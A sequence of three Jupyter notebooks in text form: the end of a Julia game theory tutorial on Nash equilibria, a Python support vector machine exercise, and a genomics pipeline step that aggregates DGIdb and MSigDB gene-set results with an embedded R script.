g_MP.players[1].payoff_array # Player 1's payoff array
g_MP.players[2].payoff_array # Player 2's payoff array
g_MP[1, 1] # payoff profile for action profile (1, 1)
# If a square matrix (2-dimensional array) is given,
# then it is considered to be a symmetric two-player game.
#
# Consider the following game (symmetric $2 \times 2$ "**Coordination Game**"):
#
# $
# \begin{bmatrix}
# 4, 4 & 0, 3 \\
# 3, 0 & 2, 2
# \end{bmatrix}
# $
coordination_game_matrix = [4 0;
3 2] # square matrix
g_Coo = NormalFormGame(coordination_game_matrix)
g_Coo.players[1].payoff_array # Player 1's payoff array
g_Coo.players[2].payoff_array # Player 2's payoff array
# Another example ("**Rock-Paper-Scissors**"):
#
# $
# \begin{bmatrix}
# 0, 0 & -1, 1 & 1, -1 \\
# 1, -1 & 0, 0 & -1, 1 \\
# -1, 1 & 1, -1 & 0, 0
# \end{bmatrix}
# $
RPS_matrix = [0 -1 1;
1 0 -1;
-1 1 0]
g_RPS = NormalFormGame(RPS_matrix)
# The second is to specify the sizes of the action sets of the players
# to create a `NormalFormGame` instance filled with payoff zeros,
# and then set the payoff values to each entry.
#
# Let us construct the following game ("**Prisoners' Dilemma**"):
#
# $
# \begin{bmatrix}
# 1, 1 & -2, 3 \\
# 3, -2 & 0, 0
# \end{bmatrix}
# $
g_PD = NormalFormGame((2, 2)) # There are 2 players, each of whom has 2 actions
g_PD[1, 1] = [1, 1]
g_PD[1, 2] = [-2, 3]
g_PD[2, 1] = [3, -2]
g_PD[2, 2] = [0, 0];
g_PD
g_PD.players[1].payoff_array
# Finally, a `NormalFormGame` instance can be constructed by giving an array of `Player` instances,
# as explained in the next section.
# ### Creating a `Player`
# A `Player` instance is created by passing an array of dimension $N$
# that represents the player's payoff function ("payoff array").
#
# Consider the following game (a variant of "**Battle of the Sexes**"):
#
# $
# \begin{bmatrix}
# 3, 2 & 1, 1 \\
# 0, 0 & 2, 3
# \end{bmatrix}
# $
player1 = Player([3 1; 0 2])
player2 = Player([2 0; 1 3]);
# Beware that in `payoff_array[h, k]`, `h` refers to the player's own action,
# while `k` refers to the opponent player's action.
player1.payoff_array
player2.payoff_array
# Passing an array of Player instances is the third way to create a `NormalFormGame` instance:
g_BoS = NormalFormGame((player1, player2))
# ### More than two players
# Games with more than two players are also supported.
# Let us consider the following version of $N$-player **Cournot Game**.
#
# There are $N$ firms (players) which produce a homogeneous good
# with common constant marginal cost $c \geq 0$.
# Each firm $i$ simultaneously determines the quantity $q_i \geq 0$ (action) of the good to produce.
# The inverse demand function is given by the linear function $P(Q) = a - Q$, $a > 0$,
# where $Q = q_1 + \cdots + q_N$ is the aggregate supply.
# Then the profit (payoff) for firm $i$ is given by
# $$
# u_i(q_i, q_{i+1}, \ldots, q_{i+N-1})
# = P(Q) q_i - c q_i
# = \left(a - c - \sum_{j \neq i} q_j - q_i\right) q_i.
# $$
# Theoretically, the set of actions, i.e., available quantities, may be
# the set of all nonnegative real numbers $\mathbb{R}_+$
# (or a bounded interval $[0, \bar{q}]$ with some upper bound $\bar{q}$),
# but for computation on a computer we have to discretize the action space
# and only allow for finitely many grid points.
#
# The following script creates a `NormalFormGame` instance of the Cournot game as described above,
# assuming that the (common) grid of possible quantity values is stored in an array `q_grid`.
function cournot(a::Real, c::Real, ::Val{N}, q_grid::AbstractVector{T}) where {N,T<:Real}
nums_actions = ntuple(x->length(q_grid), Val(N))
S = promote_type(typeof(a), typeof(c), T)
payoff_array= Array{S}(undef, nums_actions)
for I in CartesianIndices(nums_actions)
Q = zero(S)
for i in 1:N
Q += q_grid[I[i]]
end
payoff_array[I] = (a - c - Q) * q_grid[I[1]]
end
players = ntuple(x->Player(payoff_array), Val(N))
return NormalFormGame(players)
end
# Here's a simple example with three firms,
# marginal cost $20$, and inverse demand function $80 - Q$,
# where the feasible quantity values are assumed to be $10$ and $15$.
# +
a, c = 80, 20
N = 3
q_grid = [10, 15] # [1/3 of Monopoly quantity, Nash equilibrium quantity]
g_Cou = cournot(a, c, Val(N), q_grid)
# -
g_Cou.players[1]
g_Cou.nums_actions
# ## Nash Equilibrium
# A *Nash equilibrium* of a normal form game is a profile of actions
# where the action of each player is a best response to the others'.
# The `Player` object has methods `best_response` and `best_responses`.
#
# Consider the Matching Pennies game `g_MP` defined above.
# For example, player 1's best response to the opponent's action 2 is:
best_response(g_MP.players[1], 2)
# Player 1's best responses to the opponent's mixed action `[0.5, 0.5]`
# (we know they are 1 and 2):
# By default, returns the best response action with the smallest index
best_response(g_MP.players[1], [0.5, 0.5])
# With tie_breaking=:random, returns randomly one of the best responses
best_response(g_MP.players[1], [0.5, 0.5], tie_breaking=:random) # Try several times
# `best_responses` returns an array of all the best responses:
best_responses(g_MP.players[1], [0.5, 0.5])
# For this game, we know that `([0.5, 0.5], [0.5, 0.5])` is a (unique) Nash equilibrium.
is_nash(g_MP, ([0.5, 0.5], [0.5, 0.5]))
is_nash(g_MP, (1, 1))
is_nash(g_MP, ([1., 0.], [0.5, 0.5]))
# ### Finding Nash equilibria
# Our package does not have sophisticated algorithms to compute Nash equilibria (yet)...
# One might look at the [`game_theory`](http://quanteconpy.readthedocs.io/en/latest/game_theory.html) module in [QuantEcon.py](https://github.com/QuantEcon/QuantEcon.py) or [Gambit](http://www.gambit-project.org),
# which implement several such algorithms.
# #### Brute force
# For small games, we can find pure action Nash equilibria by brute force,
# by calling the method [`pure_nash`](http://quantecon.github.io/Games.jl/latest/lib/computing_nash_equilibria.html#Games.pure_nash-Tuple{NormalFormGame}).
function print_pure_nash_brute(g::NormalFormGame)
NEs = pure_nash(g)
num_NEs = length(NEs)
if num_NEs == 0
msg = "no pure Nash equilibrium"
elseif num_NEs == 1
msg = "1 pure Nash equilibrium:\n$(NEs[1])"
else
msg = "$num_NEs pure Nash equilibria:\n"
for (i, NE) in enumerate(NEs)
i < num_NEs ? msg *= "$NE, " : msg *= "$NE"
end
end
println(join(["The game has ", msg]))
end
# Matching Pennies:
print_pure_nash_brute(g_MP)
# Coordination game:
print_pure_nash_brute(g_Coo)
# Rock-Paper-Scissors:
print_pure_nash_brute(g_RPS)
# Battle of the Sexes:
print_pure_nash_brute(g_BoS)
# Prisoners' Dillema:
print_pure_nash_brute(g_PD)
# Cournot game:
print_pure_nash_brute(g_Cou)
# #### Sequential best response
# In some games, such as "supermodular games" and "potential games",
# the process of sequential best responses converges to a Nash equilibrium.
# Here's a script to find *one* pure Nash equilibrium by sequential best response, if it converges.
function sequential_best_response(g::NormalFormGame{N};
init_actions::Vector{Int}=ones(Int, N),
tie_breaking=:smallest,
verbose=true) where N
a = copy(init_actions)
if verbose
println("init_actions: $a")
end
new_a = Array{Int}(undef, N)
max_iter = prod(g.nums_actions)
for t in 1:max_iter
copyto!(new_a, a)
for (i, player) in enumerate(g.players)
if N == 2
a_except_i = new_a[3-i]
else
a_except_i = (new_a[i+1:N]..., new_a[1:i-1]...)
end
new_a[i] = best_response(player, a_except_i,
tie_breaking=tie_breaking)
if verbose
println("player $i: $new_a")
end
end
if new_a == a
return a
else
copyto!(a, new_a)
end
end
println("No pure Nash equilibrium found")
return a
end
# A Cournot game with linear demand is known to be a potential game,
# for which sequential best response converges to a Nash equilibrium.
#
# Let us try a bigger instance:
a, c = 80, 20
N = 3
q_grid_size = 13
q_grid = range(0, step=div(a-c, q_grid_size-1), length=q_grid_size) # [0, 5, 10, ..., 60]
g_Cou = cournot(a, c, Val(N), q_grid)
a_star = sequential_best_response(g_Cou) # By default, start with (1, 1, 1)
println("Nash equilibrium indices: $a_star")
println("Nash equilibrium quantities: $(q_grid[a_star])")
# Start with the largest actions (13, 13, 13)
sequential_best_response(g_Cou, init_actions=[13, 13, 13])
# The limit action profile is indeed a Nash equilibrium:
is_nash(g_Cou, tuple(a_star...))
# In fact, the game has other Nash equilibria
# (because of our choice of grid points and parameter values):
print_pure_nash_brute(g_Cou)
# Make it bigger:
N = 4
q_grid_size = 61
q_grid = range(0, step=div(a-c, q_grid_size-1), length=q_grid_size) # [0, 1, 2, ..., 60]
g_Cou = cournot(a, c, Val(N), q_grid)
sequential_best_response(g_Cou)
sequential_best_response(g_Cou, init_actions=[1, 1, 1, 31])
# Sequential best response does not converge in all games:
print(g_MP) # Matching Pennies
sequential_best_response(g_MP)
# #### Support enumeration
# The routine [`support_enumeration`](http://quantecon.github.io/Games.jl/latest/lib/computing_nash_equilibria.html#Games.support_enumeration-Union{Tuple{NormalFormGame{2,T}},%20Tuple{T}}%20where%20T),
# which is for two-player games, visits all equal-size support pairs
# and checks whether each pair has a Nash equilibrium (in mixed actions) by the indifference condition.
# (This should thus be used only for small games.)
# For nondegenerate games, this routine returns all the Nash equilibria.
# Matching Pennies:
support_enumeration(g_MP)
# Coordination game:
support_enumeration(g_Coo)
# Rock-Paper-Scissors:
support_enumeration(g_RPS)
# Consider the $6 \times 6$ game by <NAME> (1997), page 12:
# +
player1 = Player(
[ 9504 -660 19976 -20526 1776 -8976;
-111771 31680 -130944 168124 -8514 52764;
397584 -113850 451176 -586476 29216 -178761;
171204 -45936 208626 -263076 14124 -84436;
1303104 -453420 1227336 -1718376 72336 -461736;
737154 -227040 774576 -1039236 48081 -300036]
)
player2 = Player(
[ 72336 -461736 1227336 -1718376 1303104 -453420;
48081 -300036 774576 -1039236 737154 -227040;
29216 -178761 451176 -586476 397584 -113850;
14124 -84436 208626 -263076 171204 -45936;
1776 -8976 19976 -20526 9504 -660;
-8514 52764 -130944 168124 -111771 31680]
)
g_vonStengel = NormalFormGame(player1, player2);
# -
length(support_enumeration(g_vonStengel))
# Note that the $n \times n$ game where the payoff matrices are given by the identy matrix
# has $2^n−1$ equilibria.
# It had been conjectured that this is the maximum number of equilibria of
# any nondegenerate $n \times n$ game.
# The game above, the number of whose equilibria is $75 > 2^6 - 1 = 63$,
# was presented as a counter-example to this conjecture.
# Next, let us study the **All-Pay Acution**,
# where, unlike standard auctions,
# bidders pay their bids regardless of whether or not they win.
# Situations modeled as all-pay auctions include
# job promotion, R&D, and rent seeking competitions, among others.
#
# Here we consider a version of All-Pay Auction with complete information,
# symmetric bidders, discrete bids, bid caps, and "full dissipation"
# (where the prize is materialized if and only if
# there is only one bidder who makes a highest bid).
# Specifically, each of $N$ players simultaneously bids an integer from $\{0, 1, \ldots, c\}$,
# where $c$ is the common (integer) bid cap.
# If player $i$'s bid is higher than all the other players',
# then he receives the prize, whose value is $r$, common to all players,
# and pays his bid $b_i$.
# Otherwise, he pays $b_i$ and receives nothing (zero value).
# In particular, if there are more than one players who make the highest bid,
# the prize gets *fully dissipated* and all the players receive nothing.
# Thus, player $i$'s payoff function is
# $$
# u_i(b_i, b_{i+1}, \ldots, b_{i+N-1}) =
# \begin{cases}
# r - b_i & \text{if $b_i > b_j$ for all $j \neq i$}, \\ - b_i & \text{otherwise}.
# \end{cases}
# $$
# The following is a script to construct a `NormalFormGame` instance
# for the All-Pay Auction game:
function all_pay_auction(r::T, c::Integer, ::Val{N};
dissipation::Bool=true) where {N,T<:Real}
nums_actions = ntuple(x->c+1, Val(N))
S = typeof(zero(T)/one(T))
payoff_array= Array{S}(undef, nums_actions)
num_ties = 0
for bids in CartesianIndices(nums_actions)
payoff_array[bids] = -(bids[1]-1)
num_ties = 1
for j in 2:N
if bids[j] > bids[1]
num_ties = 0
break
elseif bids[j] == bids[1]
if dissipation
num_ties = 0
break
else
num_ties += 1
end
end
end
if num_ties > 0
payoff_array[bids] += r / num_ties
end
end
players = ntuple(x->Player(payoff_array), Val(N))
return NormalFormGame(players)
end
N = 2
c = 5 # odd
r = 8;
g_APA_odd = all_pay_auction(r, c, Val(N))
g_APA_odd.players[1]
# Clearly, this game has no pure-action Nash equilibrium.
# Indeed:
pure_nash(g_APA_odd)
# As pointed out by Dechenaux et al. (2006),
# there are three Nash equilibria when the bid cap `c` is odd
# (so that there are an even number of actions for each player):
support_enumeration(g_APA_odd)
# In addition to a symmetric, totally mixed equilibrium (the third),
# there are two asymmetric, "alternating" equilibria (the first and the second).
# If `e` is even, there is a unique equilibrium, which is symmetric and totally mixed.
# For example:
c = 6 # even
g_APA_even = all_pay_auction(r, c, Val(N))
support_enumeration(g_APA_even)
# Note:
# `support_enumeration` is executed with exact arithmetic for input games with `Rational` payoffs.
# For example:
g_Coo_rational = NormalFormGame(Rational{Int}, g_Coo)
g_Coo_rational.players[1]
support_enumeration(g_Coo_rational)
N = 2
c = 5 # odd
r = 8//1 # Rational
g_APA_odd_rational = all_pay_auction(r, c, Val(N))
support_enumeration(g_APA_odd_rational)
# ## Further Reading
#
# * [A Recursive Formulation of Repeated Games](https://nbviewer.jupyter.org/github/QuantEcon/QuantEcon.notebooks/blob/master/recursive_repeated_games.ipynb)
# ## References
#
# * <NAME>, <NAME>, and <NAME> (2006),
# "Caps on bidding in all-pay auctions:
# Comments on the experiments of <NAME> and <NAME>,"
# Journal of Economic Behavior and Organization 61, 276-283.
#
# * <NAME> (1997),
# "[New Lower Bounds for the Number of Equilibria in Bimatrix Games](http://www.maths.lse.ac.uk/personal/stengel/TEXTE/264.pdf)."
|
game_theory_jl.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Programming Exercise 6 - Support Vector Machines
# +
# # %load ../../../standard_import.txt
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from scipy.io import loadmat
from sklearn.svm import SVC
pd.set_option('display.notebook_repr_html', False)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', 150)
pd.set_option('display.max_seq_items', None)
# #%config InlineBackend.figure_formats = {'pdf',}
# %matplotlib inline
import seaborn as sns
sns.set_context('notebook')
sns.set_style('white')
# -
def plotData(X, y):
pos = (y == 1).ravel()
neg = (y == 0).ravel()
plt.scatter(X[pos,0], X[pos,1], s=60, c='k', marker='+', linewidths=1)
plt.scatter(X[neg,0], X[neg,1], s=60, c='y', marker='o', linewidths=1)
def plot_svc(svc, X, y, h=0.02, pad=0.25):
x_min, x_max = X[:, 0].min()-pad, X[:, 0].max()+pad
y_min, y_max = X[:, 1].min()-pad, X[:, 1].max()+pad
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
Z = svc.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.2)
plotData(X, y)
#plt.scatter(X[:,0], X[:,1], s=70, c=y, cmap=mpl.cm.Paired)
# Support vectors indicated in plot by vertical lines
sv = svc.support_vectors_
plt.scatter(sv[:,0], sv[:,1], c='k', marker='|', s=100, linewidths='1')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xlabel('X1')
plt.ylabel('X2')
plt.show()
print('Number of support vectors: ', svc.support_.size)
# ### Support Vector Machines
# #### Example Dataset 1
data1 = loadmat('data/ex6data1.mat')
data1.keys()
# +
y1 = data1['y']
X1 = data1['X']
print('X1:', X1.shape)
print('y1:', y1.shape)
# -
plotData(X1,y1)
clf = SVC(C=1.0, kernel='linear')
clf.fit(X1, y1.ravel())
plot_svc(clf, X1, y1)
clf.set_params(C=100)
clf.fit(X1, y1.ravel())
plot_svc(clf, X1, y1)
# ### SVM with Gaussian Kernels
def gaussianKernel(x1, x2, sigma=2):
norm = (x1-x2).T.dot(x1-x2)
return(np.exp(-norm/(2*sigma**2)))
# +
x1 = np.array([1, 2, 1])
x2 = np.array([0, 4, -1])
sigma = 2
gaussianKernel(x1, x2, sigma)
# -
# #### Example Dataset 2
data2 = loadmat('data/ex6data2.mat')
data2.keys()
# +
y2 = data2['y']
X2 = data2['X']
print('X2:', X2.shape)
print('y2:', y2.shape)
# -
plotData(X2, y2)
clf2 = SVC(C=50, kernel='rbf', gamma=6)
clf2.fit(X2, y2.ravel())
plot_svc(clf2, X2, y2)
# #### Example Dataset 3
data3 = loadmat('data/ex6data3.mat')
data3.keys()
# +
y3 = data3['y']
X3 = data3['X']
print('X3:', X3.shape)
print('y3:', y3.shape)
# -
plotData(X3, y3)
clf3 = SVC(C=1.0, kernel='poly', degree=3, gamma=10)
clf3.fit(X3, y3.ravel())
plot_svc(clf3, X3, y3)
# ### Spam classification
data4 = pd.read_table('data/vocab.txt', header=None)
data4.info()
data4.head()
|
notebooks/Programming Exercise 6 - Support Vector Machines.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# + [markdown] deletable=true editable=true
# # Union of MSigDB overlaps and DGIdb results
#
# #### Overview
#
# Aggregate the lists from step 5 into gene sets.
#
# the genes\_, dgidb\_, and gsea\_ files generated by step5 no longer exist.
# Instead, load the json from step 5 and generate those files in a tmpdir.
#
# Then, run the R script, reading from a tmpdir,
# and storing the output files according to their paths provided by the conf.
#
# Finally, read in the output files from this step into step7 json.
# (Also keep the original output files, which the analysts use.)
#
# #### Input
#
# * the json results (5.json) of script #5, "5_get_dgidb_gsea".
# These are: gene lists, DGIDB lists, and 'gsea' lists (from Broad's MSigDB "compute overlaps")
#
# #### Output
#
# The input files are integrated together to find enriched gene sets and druggable genes.
#
# * allGeneAggregation.txt
# * GeneSetAggregation.txt
# * GeneSetDetailsPerList.txt
# * druggableGeneAggregation.txt
# * gsea_dgidb_output.xlsx
#
# Note: MSigDB input files are labeled with the "gsea\_" prefix due to association with Broad.
#
#
# ## Version history
#
# * v16
# * No longer generates xlsx file
# * adds columns to GeneSetAggregation : overlap_genes_in_comm_up overlap_genes_in_pc_up overlap_genes_in_pd_up overlap_genes_in_top5
# * v17
# * Ensures that all required columns are present even if empty
# * ignores any .json files as input to gseaMeta (will drop the GSEA creds file)
# * v18
# * Once again generates an xlsx file
# * v19
# * Python changes : now reads json and generates tmp files for r to read, instead of reading loose files. Then
# collects files created by R (except for xlsx) into json. Also broke many long lines
# into multiple lines.
#
#
# Source R script:
# * union gsea and dgidb results_vJune22.R.ipynb_version, md5: 4335daea8cce5eda70bcc61f99686cfa
# * Modified from union gsea and dgidb results_vJune22.R, md5 6be85df295e923573a0c7bdb29bb0ba6:
# + deletable=true editable=true
import os
import json
import logging
import pandas as pd
import tempfile
from collections import OrderedDict
# Setup: load conf, retrieve sample ID, logging
with open("conf.json","r") as conf:
c=json.load(conf)
sample_id = c["sample_id"]
print("Running on sample: {}".format(sample_id))
logging.basicConfig(**c["info"]["logging_config"])
logging.info("\n7: Union of MSigDB overlaps and DGIdb results")
def and_log(s):
logging.info(s)
return s
# Input files
outdir=c["dir"]["sample"]
pathway_file=c["ref_file"]["msigdb_pathway_file"]
# Output files
all_gene=c["file"]["7_out"]["all_gene_aggregation"]
drug_gene=c["file"]["7_out"]["druggable_gene_aggregation"]
geneset_agg=c["file"]["7_out"]["gene_set_aggregation"]
geneset_details=c["file"]["7_out"]["gene_set_details_per_list"]
xlsx_path=c["file"]["7_out"]["gsea_dgidb_output_excel"]
print("Reading input files from: {}".format(outdir))
print("Generating the following files for {}:\n {}".format(
sample_id,
"\n ".join([all_gene, drug_gene, geneset_agg, geneset_details, xlsx_path])
))
# Input
with open(c["json"]["5"],"r") as jf:
j5 = json.load(jf, object_pairs_hook=OrderedDict)
# Output json
j = {}
# + deletable=true editable=true
workdir = tempfile.mkdtemp(dir=c["dir"]["temp"])
logging.info("Input files for R stored in: {}".format(workdir))
workdir
# + [markdown] deletable=true editable=true
# Write the gsea, dgidb, and gene results from step 5 to temp files so they're easily accessible by the R script.
# Each genelist has been loaded as an OrderedDicts which keeps them consistent with the order in which they arrived from the API.
# + deletable=true editable=true
# Dgidb results to file.
# structure is GENE and DRUG
for genelist in j5["dgidb_results"]:
filepath = os.path.join(workdir, "dgidb_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
with open(filepath, "w") as f:
for gene in j5["dgidb_results"][genelist]:
for drug in j5["dgidb_results"][genelist][gene]:
f.write("{} and {}\n".format(gene, drug))
f.write("\n") # prevent noeol or the R gets upset later
# + deletable=true editable=true
# GSEA results to file
# It's just a big unicode string
for genelist in j5["gsea_results"]:
filepath = os.path.join(workdir, "gsea_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
with open(filepath, "w") as f:
f.write(j5["gsea_results"][genelist])
f.write("\n") # prevent noeol or the R gets upset later
# + deletable=true editable=true
# Gene lists to file
# as an orderedDict, they stay in the order from the json - sample\tpd_median
for genelist in j5["genelists"]:
filepath = os.path.join(workdir, "genes_{}_{}".format(sample_id, genelist))
print("writing {}".format(filepath))
if(genelist == "comm_up"):
with open(filepath, "w") as f:
f.write("Gene\n")
for gene in j5["genelists"][genelist]:
f.write("{}\n".format(gene))
else:
geneframe = pd.DataFrame.from_dict(
j5["genelists"][genelist],
orient="columns",
dtype="float64"
)
geneframe.to_csv(filepath, sep="\t", index_label="Gene")
print("Gene files written.")
# + [markdown] deletable=true editable=true
# Then, run the R script to aggregate gene lists.
#
# To install the openxlsx library if it's not available:
# `install.packages("openxlsx", dependencies=TRUE)`
# + deletable=true editable=true
# some abbreviated args to shorten the R script argument line --
# these will get reparsed immediately into new variable names
sid=sample_id
wd=workdir
pf=pathway_file
agf=all_gene
dgf=drug_gene
gaf=geneset_agg
gdf=geneset_details
xf=xlsx_path
# + deletable=true editable=true magic_args="Rscript - \"$sid\" \"$wd\" \"$pf\" \"$agf\" \"$dgf\" \"$gaf\" \"$gdf\" \"$xf\"" language="script"
#
# # version notes
# # v10 - fixed column names; now you can distinguish pc_up from pd_up
# # v11 - add overview tab to excel output <- expected to change
# # v12 - fixed duplication of data in two columns: pc-dgidb and pcd-dgidb
# # v13 - added "unique" to fix duplication of data when retrieving drug interactions,
# # e.g. for pancanUp_DGIdb
# # v14 - add ranking to drugs
# # v15 - export ranking to drugs in text as well as xlsx
# # further version notes listed above
#
# # Libraries
# library(reshape2)
# library(data.table)
# library(openxlsx)
# Sys.setenv(R_ZIPCMD= "/usr/bin/zip") # Needed for xls generation
#
# # Function - combine gsea & dgidb into an excel worksheet
# # Dir must not contain gsea_ and dgidb_ files that don't pertain to the sample
#
# combine.gsea.dgidb<-function(sampleID,
# dataDir,
# pathwayFile,
# allGeneAggFilename,
# druggableGeneAggFilename,
# geneSetAggFilename,
# geneSetDetailsFilename,
# xlF
# ){
#
# print(paste("Processing sample: ", sampleID)) # ETK DEBUG
#
#
# gseaEmptyFileSizeMaximum=175
# dgiDbEmptyFileSize=1
#
# ###
# ### setup
# ###
#
# options(stringsAsFactors=FALSE)
#
# read.txt<-function (file="", sep="\t", header=TRUE,row.names=NULL, quote="", ...){
# print(paste("Reading file: ", file))
# read.table(file, sep= sep, header= header, row.names= row.names, quote= quote, ...)
# }
#
# write.txt<-function (x, file="", quote=FALSE, sep="\t", row.names=FALSE, ...){
# write.table(x, file, quote=quote, sep=sep, row.names=row.names, ...)
# }
#
# ###
# ### load generic pathways
# ###
# allPathwaysFileRaw=pathwayFile
#
# allPathwaysRaw=scan(allPathwaysFileRaw, what="list", sep="\n")
# maxLen=0
# allPathwaysMatrixList=lapply(allPathwaysRaw, function(x) {
# y1=strsplit(x, "\t")[[1]];
# y2= y1[3:length(y1)];
# matrix(data=c(rep(y1[1], length=length(y2)), y2), ncol=2, byrow=FALSE)})
# allPathwaysDF <-data.frame(do.call("rbind", allPathwaysMatrixList))
# colnames(allPathwaysDF)=c("GeneSet", "Gene")
#
# setwd(dataDir)
#
#
# ###
# ### load genes in lists, e.g. pancan, panDisease and top 5pct
# ###
# geneMeta=data.frame(fn=list.files(,paste0("genes_", sampleID, "*")))
# # currently, this imports the following files:
# # genes_[sampleID]_comm_up,
# # genes_[sampleID]_pc_down,
# # genes_[sampleID]_pc_up,
# # genes_[sampleID]_pd_down,
# # genes_[sampleID]_pd_up,
# # genes_[sampleID]_top5
# geneMeta $sampleName= sampleID# lgCommonSubstring(geneMeta $fileID)
# geneMeta $dataTag=gsub(paste0("^.*",sampleID, "_"), "", geneMeta $fn)
# geneMeta=subset(geneMeta, ! grepl(".xlsx$", fn))
#
# # make matrix of genes v lists
# # if gene list is empty, return empty dataframe rather than throwing error
# geneDataRaw=lapply(geneMeta $fn, read.txt) #("genes_SRR1988322b")
# geneNameAndTag=Reduce("rbind",lapply(1:nrow(geneMeta),
# function(x) {
# if(length(geneDataRaw[[x]][,1]) == 0){
# data.frame()
# } else{
# data.frame(
# gene= geneDataRaw[[x]][,1],
# sampleName= geneMeta $sampleName[x] ,
# dataTag = geneMeta $dataTag[x])
# }}
# ))
# geneByThGeneListOrig=dcast(geneNameAndTag, gene ~ dataTag, value.var="sampleName",
# fun.aggregate=length)
#
#
# # If a list, eg pc_up, has no outliers, its column will be missing from
# # geneByThGeneListOrig . Add any missing columns back in, with values all 0
# expectedGeneSetsFromFile=c("comm_up", "pc_down", "pc_up", "pd_down", "pd_up", "top5")
# geneSetColsToAdd=! expectedGeneSetsFromFile %in% colnames(geneByThGeneListOrig)
# if (sum(geneSetColsToAdd)>0){
# emptyGeneSetToAdd=data.frame( matrix(,
# ncol=sum(geneSetColsToAdd),
# nrow=nrow(geneByThGeneListOrig),
# data=0))
#
# colnames(emptyGeneSetToAdd)=expectedGeneSetsFromFile[geneSetColsToAdd]
# geneByThGeneList=cbind(geneByThGeneListOrig, emptyGeneSetToAdd)
#
# # Put the columns back in their original order
# geneByThGeneList= geneByThGeneList[, c("gene", expectedGeneSetsFromFile)]
# } else {
# geneByThGeneList= geneByThGeneListOrig
# }
#
# oldnames=colnames(geneByThGeneList)[2:ncol(geneByThGeneList)]
# colnames(geneByThGeneList)=c("gene", paste0("inSet_", oldnames))
# geneByThGeneList$thListsContainingGene=rowSums(
# as.matrix(geneByThGeneList[2:ncol(geneByThGeneList)]))
#
#
# ###
# ### identify which genes are druggable
# ###
#
# # get metadata from dgidb files
# dgMeta=data.frame(fn=list.files(,"dgidb_."))
# dgMeta$sampleName= sampleID
# dgMeta$dataTag=gsub(paste0("^.*",sampleID, "_"), "", dgMeta $fn)
# dgMeta$fileInfo=file.info(dgMeta $fn)
# dgMeta =subset(dgMeta, ! grepl(".xlsx$", fn))
#
# dgMeta $empty = dgMeta $fileInfo$size== dgiDbEmptyFileSize
# dgMetaNonEmpty=subset(dgMeta, !empty)
#
#
# # make matrix of genes v lists
# dgDataRaw=lapply(dgMetaNonEmpty $fn, read.txt, header=F)
# #("dgidb_export_2017-01-03.SRR1988322c.tsv")
#
# dgDataInteractions=data.frame(rawInteraction=unlist(lapply(dgDataRaw, function(x) x$V1)))
# dgDataInteractions$gene=gsub(" .* .*", "", dgDataInteractions $rawInteraction)
# dgDataInteractions$drug=gsub("^.*and ", "", dgDataInteractions $rawInteraction)
# dgDataGeneNames=lapply(dgDataRaw, function(x) unique(gsub(" .* .*", "", x$V1)))
# dgDataGeneNameAndTag=Reduce(
# "rbind",lapply(1:nrow(dgMetaNonEmpty),
# function(x) data.frame(druggableGene=dgDataGeneNames[[x]],
# sampleName=dgMeta$sampleName[x] ,
# dataTag = dgMetaNonEmpty $dataTag[x])))
# druggableGeneByThGeneList=dcast(dgDataGeneNameAndTag, druggableGene ~ dataTag,
# value.var="sampleName", fun.aggregate=length)
# druggableGeneByThGeneList $thListsContainingGene =rowSums(
# as.matrix(druggableGeneByThGeneList[2:ncol(druggableGeneByThGeneList)]))
# druggableGeneByThGeneList = druggableGeneByThGeneList[
# order(druggableGeneByThGeneList $thListsContainingGene, decreasing=TRUE),]
#
# geneByThGeneList$druggableGene=
# geneByThGeneList$gene %in% druggableGeneByThGeneList$druggableGene
#
# geneByThGeneList2= geneByThGeneList
#
# colsToCheck=2:7
# setsToConsider=colnames(geneByThGeneList2 ) [colsToCheck]
#
# geneByThGeneList2$setCombo=apply(
# geneByThGeneList2[, colsToCheck], 1,
# function(x) gsub("inSet_", "", paste(setsToConsider[as.logical(x)], collapse=",")))
# # x= geneByThGeneList2[21,]
#
# geneByThGeneList2$setCombo[geneByThGeneList2$druggableGene]=paste0(
# geneByThGeneList2$setCombo[geneByThGeneList2$druggableGene], ",druggable")
#
# write.txt(geneByThGeneList, paste(allGeneAggFilename))
#
#
# ###
# ### analyze gene sets enriched pathways
# ###
#
# # get metadata from gsea files
# gseaMeta=data.frame(fn=list.files(,"gsea_.*"))
# gseaMeta$sampleName=sampleID # lgCommonSubstring(gseaMeta$fileID)
# gseaMeta$dataTag=gsub(paste0("^.*",sampleID, "_"), "", gseaMeta $fn)
# gseaMeta =subset(gseaMeta, ! grepl(".xlsx$", fn))
# gseaMeta =subset(gseaMeta, ! grepl(".json$", fn))
#
# gseaMeta $fileInfo=file.info(gseaMeta $fn)
# gseaMeta $empty = gseaMeta $fileInfo$size <= gseaEmptyFileSizeMaximum
# gseaMetaNonEmpty=subset(gseaMeta, !empty)
#
#
#
# gseaGeneSetListRaw <-list()
#
# ### identify pathways enriched per Th Gene List
# for (i in 1:nrow(gseaMetaNonEmpty)){
# # i=1
# #
# # pull locations out of multi-table gsea file
# #
# allGseaInfoRaw=scan(gseaMetaNonEmpty $fn[i], what="list", sep="\n",
# blank.lines.skip=FALSE)
# firstLineOfGeneSetTable=grep("^Gene Set Name", allGseaInfoRaw)
# afterEndOfGeneSetTable=grep("Gene/Gene Set Overlap Matrix", allGseaInfoRaw)
# allBlankLines=which(allGseaInfoRaw =="")
# lastLineOfGeneSetTable =sort(allBlankLines[allBlankLines<afterEndOfGeneSetTable],
# decreasing=TRUE)[2]-1
# firstLineOfGeneSet_GeneMatrix=grep("^Entrez Gene Id", allGseaInfoRaw)
#
# #
# # pull gene set name table out of multi-table gsea file
# #
